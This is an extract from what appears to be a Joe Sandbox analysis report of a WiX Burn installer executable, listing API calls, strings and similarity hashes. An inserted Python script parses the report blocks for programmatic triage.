• GetLastError.KERNEL32(?,?,00A40013,00A1E93B,00A1E93B,?,00000000,0000FDE9,?,00A1E93B,8000FFFF,Unexpected return value from message pump.), ref: 00A407BC
Strings
Memory Dump Source
• Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
Similarity
• API ID: ErrorFileLastWritelstrlen
• String ID: logutil.cpp
• API String ID: 606256338-3545173039
• Opcode ID: bd50acace852d1c108796aacea920985f90205b0c0d1648ad1f0518c3b70660a
• Instruction ID: c49efef616d1455402154e9ce2d9a499461d5e7340d80d3222807dcdb0a7730c
• Opcode Fuzzy Hash: bd50acace852d1c108796aacea920985f90205b0c0d1648ad1f0518c3b70660a
• Instruction Fuzzy Hash: E811CA7A940524ABC710DBB9DD44EABBA7CEBC5760B014214FE01E7140D771ED00DAE1
APIs
  • Part of subcall function 00A2140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00A20A19,?,?,?), ref: 00A21434
  • Part of subcall function 00A2140C: GetLastError.KERNEL32(?,00A20A19,?,?,?), ref: 00A2143E
• ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 00A20A27
• GetLastError.KERNEL32 ref: 00A20A31
Strings
• Failed to read during cabinet extraction., xrefs: 00A20A5F
• cabextract.cpp, xrefs: 00A20A55
Memory Dump Source
• Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
Similarity
• API ID: ErrorFileLast$PointerRead
• String ID: Failed to read during cabinet extraction.$cabextract.cpp
• API String ID: 2170121939-2426083571
• Opcode ID: af5718f3ab42663e85de5abd16c36c2a3a8f771528b91813b0931b463bf9d5b9
• Instruction ID: 797ff28746f0521ad78fef96de5eff98399eb9ab96e3abd1031476280f0db196
• Opcode Fuzzy Hash: af5718f3ab42663e85de5abd16c36c2a3a8f771528b91813b0931b463bf9d5b9
• Instruction Fuzzy Hash: B811CE7BA00279BBCB219F99ED04E9E7F78FB457A0B014265FE04A7291C7309910CAE0
APIs
• SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00A20A19,?,?,?), ref: 00A21434
• GetLastError.KERNEL32(?,00A20A19,?,?,?), ref: 00A2143E
Strings
• cabextract.cpp, xrefs: 00A21462
• Failed to move to virtual file pointer., xrefs: 00A2146C
Memory Dump Source
• Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID: Failed to move to virtual file pointer.$cabextract.cpp
• API String ID: 2976181284-3005670968
• Opcode ID: 1140f5b8a8384481a89f25d52a910e2e7b429353fb7f9a2f2f00801ae0b1543b
• Instruction ID: bf399738fdc7b8bcce6259f983321af5e7bd4f1a682bbdb1500a74c3abd3c5d9
• Opcode Fuzzy Hash: 1140f5b8a8384481a89f25d52a910e2e7b429353fb7f9a2f2f00801ae0b1543b
• Instruction Fuzzy Hash: 4E018477540639B7C7219A99AC09E8BBF25FF607717118125FD2C5A151D731D810C6D0
APIs
• SetEvent.KERNEL32(00A4B478,00000000,?,00A21717,?,00000000,?,00A0C287,?,00A05405,?,00A175A5,?,?,00A05405,?), ref: 00A207BF
• GetLastError.KERNEL32(?,00A21717,?,00000000,?,00A0C287,?,00A05405,?,00A175A5,?,?,00A05405,?,00A05445,00000001), ref: 00A207C9
Strings
• Failed to set begin operation event., xrefs: 00A207F7
• cabextract.cpp, xrefs: 00A207ED
Memory Dump Source
• Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
Similarity
• API ID: ErrorEventLast
• String ID: Failed to set begin operation event.$cabextract.cpp
• API String ID: 3848097054-4159625223
• Opcode ID: 07672cb39e025761d312cd7cdc93018884d36100b55f8377a8927ce13961fdf7
• Instruction ID: 208a7da157f6f7f5ee4222a69c841c79334a54342ad6def247bf1677a7a04ce4
• Opcode Fuzzy Hash: 07672cb39e025761d312cd7cdc93018884d36100b55f8377a8927ce13961fdf7
• Instruction Fuzzy Hash: 29F0273B64263163822063AD6D05E8B7688AE01BA1B010131FF00B7181E670AC00C2E5
APIs
• lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,00A01104,?,?,00000000), ref: 00A05142
• CompareStringW.KERNELBASE(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,00A01104,?,?,00000000), ref: 00A05172
Memory Dump Source
• Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
Similarity
• API ID: CompareStringlstrlen
• String ID: burn.clean.room
• API String ID: 1433953587-3055529264
• Opcode ID: 01b43fd04e268ec04d0e3a8ec88c2a3084ce5305f6a3730acee0af300d64329e
• Instruction ID: e28d10cdc1389586d6c6ef3849177ebb0480fe9c5e153eff2a48caf72942a3d2
• Opcode Fuzzy Hash: 01b43fd04e268ec04d0e3a8ec88c2a3084ce5305f6a3730acee0af300d64329e
• Instruction Fuzzy Hash: 2A014F769105286EC7249BE8AD84A73B7BCEB657A0B104217F505D2690D371AC42CEA1
APIs
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00A03877
• GetLastError.KERNEL32 ref: 00A03881
• LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 00A038EA
Memory Dump Source
• Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
Similarity
• API ID: DirectoryErrorLastLibraryLoadSystem
• String ID:
• API String ID: 1230559179-0
• Opcode ID: 3045cc7eafa56b6f5d9199330aee62e8c7c31992fc40dc1edba196cad4ccc368
• Instruction ID: 31e728a49dca84290f1f799c3a55a031097054555c76835ed5c34ae3a8ea82af
• Opcode Fuzzy Hash: 3045cc7eafa56b6f5d9199330aee62e8c7c31992fc40dc1edba196cad4ccc368
• Instruction Fuzzy Hash: FC21C4B7D0123D6BDB20DBA9AC49F9A776C9B44750F1105A1BD14E7281DA70DE448AA0
APIs
• GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00A03BB6,00000000,?,00A01474,00000000,75C0B390,00000000,75C0B390,00000000,?,?,00A013B8), ref: 00A03A20
• RtlFreeHeap.NTDLL(00000000,?,00A03BB6,00000000,?,00A01474,00000000,75C0B390,00000000,75C0B390,00000000,?,?,00A013B8,?,00000100), ref: 00A03A27
• GetLastError.KERNEL32(?,00A03BB6,00000000,?,00A01474,00000000,75C0B390,00000000,75C0B390,00000000,?,?,00A013B8,?,00000100,?), ref: 00A03A31
Memory Dump Source
• Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
Similarity
• API ID: Heap$ErrorFreeLastProcess
• String ID:
• API String ID: 406640338-0
• Opcode ID: 60171194ff8ab1e282ff8b0a57eb0fb758ebf93149c55fec6151659e68729291
• Instruction ID: 3b1a4a5561c60b228efa0fd1293b2c474ebe07539407104927aa970cf197a377
• Opcode Fuzzy Hash: 60171194ff8ab1e282ff8b0a57eb0fb758ebf93149c55fec6151659e68729291
• Instruction Fuzzy Hash: 78D0C23BA0013967872097EA6C0C95B7E5CEF82BE27010120FE44D6220D723CC0082F0
APIs
  • Part of subcall function 00A40F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00A6AAA0,00000000,?,00A457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00A40F80
• RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,?,00A17D59,?,?,?), ref: 00A0F7B9
  • Part of subcall function 00A41026: RegQueryValueExW.ADVAPI32(00000004,?,00000000,00000000,?,00000000,?,00000000,?,?,?,00A0F78E,00000000,Installed,00000000,?), ref: 00A4104B
Memory Dump Source
• Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Installed
• API String ID: 3677997916-3662710971
• Opcode ID: d11277d08bec694d5d5ad8112c8728e04045a4a6b01124f20d0e451724235d6d
• Instruction ID: 1c6f99ffc323a1d5d386da0499c5c08ff77146311e740945d0e63b26f80cacdd
• Opcode Fuzzy Hash: d11277d08bec694d5d5ad8112c8728e04045a4a6b01124f20d0e451724235d6d
• Instruction Fuzzy Hash: 7A018F3682011CFFCB21DBA4D946FDEBBB8EF44711F1141A5E800A7150D3769E409791
APIs
• RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00A6AAA0,00000000,?,00A457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00A40F80
Memory Dump Source
• Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
Similarity
• API ID: Open
• String ID: regutil.cpp
• API String ID: 71445658-955085611
• Opcode ID: 9ccedc3c50d2c28f6d658eaa9dc930da3f731d7322eaf9db02bb86408d5c4a4f
• Instruction ID: ef890708fc2ba6b951223b35b899290eab80cd611b31d91894086679ce9f8c82
• Opcode Fuzzy Hash: 9ccedc3c50d2c28f6d658eaa9dc930da3f731d7322eaf9db02bb86408d5c4a4f
• Instruction Fuzzy Hash: 50F0463B601132B68B3006968C05F6BBA69EBC07B0B158131BF46AA250E2718C04B6F0
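The function blocks in this report follow a fixed record layout (an APIs list, optional Strings with xrefs, the memory dump source, and a Similarity section with API/String/Opcode IDs). A report this long is easier to triage programmatically than by scrolling, so the following is an added example, not part of the Joe Sandbox report or of the analysed sample: a small parser that turns these records into structured data, plus two triage helpers built on it. The sample input is three of the records shown above, copied into the script so it runs offline; the values in parentheses are whatever the sandbox captured on the stack at the call site, so the helpers treat them as hints rather than as authoritative arguments.

```python
"""Parse Joe Sandbox per-function blocks (APIs / Strings / Similarity records)
into structured data for programmatic triage. Added example, not report code."""
import re
from dataclasses import dataclass, field

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# One API line: the call, the module it resolved into, the stack values the
# sandbox captured (optional), and the call-site address. "Part of subcall
# function" lines additionally carry the address of the callee function.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][\w@]*)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    parent: str = ""          # non-empty only for "Part of subcall function" lines


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: dict = field(default_factory=dict)      # string -> [xref addresses]
    similarity: dict = field(default_factory=dict)   # "API ID", "Opcode ID", ...


def parse_blocks(text):
    """Split report text into FunctionRecords; every block opens with 'APIs'."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if current is None or not line.startswith("•"):
            continue
        item = line.lstrip("•").strip()
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                current.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["parent"] or ""))
        elif section == "Strings" and ", xrefs: " in item:
            value, xrefs = item.rsplit(", xrefs: ", 1)
            current.strings[value] = [x.strip() for x in xrefs.split(",")]
        elif section == "Similarity" and ": " in item:     # "String ID:" with no value is skipped
            key, value = item.split(": ", 1)
            current.similarity[key] = value.strip()
    return records


def api_sequence(rec):
    """Call chain of one block in report order, e.g. ['SetEvent.KERNEL32', ...]."""
    return [f"{c.name}.{c.module}" for c in rec.apis]


def registry_key_hints(records):
    """Pair each RegOpenKeyEx* call with captured stack values that look like key paths."""
    hits = []
    for rec in records:
        for call in rec.apis:
            if call.name.startswith("RegOpenKeyEx"):
                hits.append((call.ref, [a for a in call.args if "\\" in a]))
    return hits


def loads_from_system_dir(rec):
    """True when GetSystemDirectoryW precedes LoadLibraryW in the same block, the usual
    shape of loading a DLL by absolute System32 path (confirm in the disassembly)."""
    names = [c.name for c in rec.apis]
    if "GetSystemDirectoryW" in names and "LoadLibraryW" in names:
        return names.index("GetSystemDirectoryW") < names.index("LoadLibraryW")
    return False


# Sample input: three records copied from the report above.
SAMPLE = r"""
APIs
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00A03877
• GetLastError.KERNEL32 ref: 00A03881
• LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 00A038EA
Similarity
• API ID: DirectoryErrorLastLibraryLoadSystem
• String ID:
• API String ID: 1230559179-0
APIs
  • Part of subcall function 00A40F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00A6AAA0,00000000,?,00A457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00A40F80
• RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,?,00A17D59,?,?,?), ref: 00A0F7B9
  • Part of subcall function 00A41026: RegQueryValueExW.ADVAPI32(00000004,?,00000000,00000000,?,00000000,?,00000000,?,?,?,00A0F78E,00000000,Installed,00000000,?), ref: 00A4104B
Strings
Similarity
• API ID: CloseOpenQueryValue
• String ID: Installed
• API String ID: 3677997916-3662710971
APIs
• SetEvent.KERNEL32(00A4B478,00000000,?,00A21717,?,00000000,?,00A0C287,?,00A05405,?,00A175A5,?,?,00A05405,?), ref: 00A207BF
• GetLastError.KERNEL32(?,00A21717,?,00000000,?,00A0C287,?,00A05405,?,00A175A5,?,?,00A05405,?,00A05445,00000001), ref: 00A207C9
Strings
• Failed to set begin operation event., xrefs: 00A207F7
• cabextract.cpp, xrefs: 00A207ED
"""

if __name__ == "__main__":
    for rec in parse_blocks(SAMPLE):
        print(" -> ".join(api_sequence(rec)), "| strings:", list(rec.strings))
    print("registry key hints:", registry_key_hints(parse_blocks(SAMPLE)))
```

Feeding the whole report through parse_blocks and grouping records by the Similarity "API ID" or by a string such as cabextract.cpp is a quick way to cluster the hundreds of blocks into the handful of source files they came from.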
                                                                                                                                                              APIs
                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F491
                                                                                                                                                                • Part of subcall function 00A4998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A49A09
                                                                                                                                                                • Part of subcall function 00A4998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A49A1A
                                                                                                                                                              Strings
Memory Dump Source
• Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: PA9n
• API String ID: 1269201914-1067447980
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3F491
  • Part of subcall function 00A4998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A49A09
  • Part of subcall function 00A4998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A49A1A
Strings
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: PA9n
• API String ID: 1269201914-1067447980
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3F491
  • Part of subcall function 00A4998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A49A09
  • Part of subcall function 00A4998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A49A1A
Strings
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: PA9n
• API String ID: 1269201914-1067447980
APIs
• GetProcessHeap.KERNEL32(?,?,?,?,00A0226D,?,?,00000001,75C0B390,8000FFFF,?,?,00A40267,?,?,00000000), ref: 00A03B04
• RtlReAllocateHeap.NTDLL(00000000,?,00A0226D,?,?,00000001,75C0B390,8000FFFF,?,?,00A40267,?,?,00000000,00000000,8000FFFF), ref: 00A03B0B
Similarity
• API ID: Heap$AllocateProcess
• String ID:
• API String ID: 1357844191-0
APIs
• GetProcessHeap.KERNEL32(?,?,?,00A02274,?,00000001,75C0B390,8000FFFF,?,?,00A40267,?,?,00000000,00000000,8000FFFF), ref: 00A03960
• RtlAllocateHeap.NTDLL(00000000,?,00A02274,?,00000001,75C0B390,8000FFFF,?,?,00A40267,?,?,00000000,00000000,8000FFFF), ref: 00A03967
Similarity
• API ID: Heap$AllocateProcess
• String ID:
• API String ID: 1357844191-0
APIs
• VariantInit.OLEAUT32(?), ref: 00A435F8
  • Part of subcall function 00A4304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00A43609,00000000,?,00000000), ref: 00A43069
  • Part of subcall function 00A4304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00A2C025,?,00A05405,?,00000000,?), ref: 00A43075
Similarity
• API ID: ErrorHandleInitLastModuleVariant
• String ID:
• API String ID: 52713655-0
APIs
• RegCloseKey.ADVAPI32(80070490,00000000,80070490,00A6AAA0,00000000,80070490,?,?,00A18B19,WiX\Burn,PackageCache,00000000,00A6AAA0,00000000,00000000,80070490), ref: 00A458CA
  • Part of subcall function 00A410B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00A4112B
  • Part of subcall function 00A410B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00A41163
Similarity
• API ID: QueryValue$Close
• String ID:
• API String ID: 1979452859-0
APIs
• RtlAllocateHeap.NTDLL(00000000,?,?,?,00A31F87,?,0000015D,?,?,?,?,00A333E0,000000FF,00000000,?,?), ref: 00A3524C
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                              • Opcode ID: e3e06d01579a7b77ce73ac95746ba6142b3c36d9fc901c17dcd15b8563b23949
                                                                                                                                                              • Instruction ID: 5f81f516b5438ccd80abcea69654d5b8e279d9b8b18f1a6bec31069f30a47b8f
                                                                                                                                                              • Opcode Fuzzy Hash: e3e06d01579a7b77ce73ac95746ba6142b3c36d9fc901c17dcd15b8563b23949
                                                                                                                                                              • Instruction Fuzzy Hash: A5E02B31D00A645EDB212BFD9C06BDBB7589FA23A0F250210FC1192090CBA0DC4141F1
                                                                                                                                                              APIs
                                                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00A18BD3,0000001C,80070490,00000000,00000000,80070490), ref: 00A034D5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FolderPath
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1514166925-0
                                                                                                                                                              • Opcode ID: 8c3b068cc64872457b192543bf8ab0648387f2f1ac57be945eb9d45f61353f60
                                                                                                                                                              • Instruction ID: 19d7a299d273ad45a3c603546a6d3acb9191117e9914f42e5587011c9d02e7c0
                                                                                                                                                              • Opcode Fuzzy Hash: 8c3b068cc64872457b192543bf8ab0648387f2f1ac57be945eb9d45f61353f60
                                                                                                                                                              • Instruction Fuzzy Hash: B8E0127620122C7BEA026FA5AC09DEB7B5C9F067557008451BE40DA050D763E55087B4
                                                                                                                                                              APIs
                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A4966B
                                                                                                                                                                • Part of subcall function 00A4998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A49A09
                                                                                                                                                                • Part of subcall function 00A4998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A49A1A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                              • Opcode ID: c8572593815b3dbc5b91917de01ad789409c5f2003d3d17c761944b03f7a17ad
                                                                                                                                                              • Instruction ID: 671c6e4167fdc2805e876bd3ae18eed707faa5585237fa3571f7017326753922
                                                                                                                                                              • Opcode Fuzzy Hash: c8572593815b3dbc5b91917de01ad789409c5f2003d3d17c761944b03f7a17ad
                                                                                                                                                              • Instruction Fuzzy Hash: A5B012AA2783017C3A4492582F53C37413CC5C0B11331461EF014E1051E8440C160533
                                                                                                                                                              APIs
                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A4966B
                                                                                                                                                                • Part of subcall function 00A4998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A49A09
                                                                                                                                                                • Part of subcall function 00A4998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A49A1A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                              • Opcode ID: c36eb0da9d6a1556e8e8c8bd8ea47a8b5c875b4f512cddc82de05c43ebdf08fd
                                                                                                                                                              • Instruction ID: 5a5ff243be521a9beed0e0a91da8288d665c3a12689136c3fe0425af54c1b826
                                                                                                                                                              • Opcode Fuzzy Hash: c36eb0da9d6a1556e8e8c8bd8ea47a8b5c875b4f512cddc82de05c43ebdf08fd
                                                                                                                                                              • Instruction Fuzzy Hash: 30B012AA2785027C364492181D03C37413CC1C0B11331C61EF400D1051E8401C190133
                                                                                                                                                              APIs
                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A4966B
                                                                                                                                                                • Part of subcall function 00A4998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A49A09
                                                                                                                                                                • Part of subcall function 00A4998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A49A1A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
